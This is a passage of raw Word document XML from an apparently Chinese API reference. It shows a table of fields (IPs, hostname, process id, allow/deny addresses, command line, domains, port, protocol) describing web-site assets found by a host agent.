      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bindingCount": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "deployPath": "/root/apache-tomcat-8.0.38/webapps"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478114FC"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736"/>
        <w:gridCol w:w="1010"/>
        <w:gridCol w:w="2918"/>
        <w:gridCol w:w="4418"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="049AE83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E0EDA6B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ADE10AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="143222C7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="626CD7AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0EDCE1CE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45CB035C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="184CAC8D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="508465AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="023D907E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agent uuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5BDB59CE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ACF5FDF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="109DDC29" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1313C4D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78728168" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>显示IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="33AA5EFA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09112AC0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72A1C557" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="431C8049" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="377236BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6CF942A1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A0A7BC2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F3A7A45" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31719D22" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EA5E2C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2974FDE2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="317E1AFE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DDE4988" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63B7B647" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19D8B3C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="73B18CCC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="083C89DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1581B70F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C5870C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57EB29DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4BD00A5F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D7370EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50C0605B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F3D73AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="738B8DE9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3CAE7C14" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="072AB98E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D1D244D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32065BCA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38FC289A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="028A903B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CDAE6D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44D62B82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="674FE18E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E8D01CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="20E3450B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18CBE600" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61435B2D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="700DC1A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ACA6075" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="52AA691B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49DC76FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29CD8008" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BB58E9E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F2D29D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="614B9B86" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E8F0866" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>allow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="004217DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="029A0E7E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B2ABAC2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>允许地址，仅Linux及</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="67B19ED5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C9A55CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>deny</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37DA3F16" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AB30FE0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5274D8E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>拒绝地址，仅Linux及Windows-nginx</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="519B20A6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="242742D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cmd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="113B4C48" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AEA1F67" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72C38390" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程启动命令行参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0105F784" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47406B87" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>domains</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D69F11D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34539B8F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name: varchar(128) title：varchar(512) ip：varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0683955E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>域名信息列表 name：域名名称 title：标题 ip：绑定ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4DADE84F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CF5378D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="466109B2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13BDBF11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7157BB00" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>启动服务用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4E45641F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23B5FB8A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="177F92A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14291EDB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08916E69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>站点类型，如nginx，http</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="13509314" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="571ED905" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="557873E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09032BA7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59AE6B20" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="45F4F1EE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="152721B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>proto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="194411FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6372E176" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="494061CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
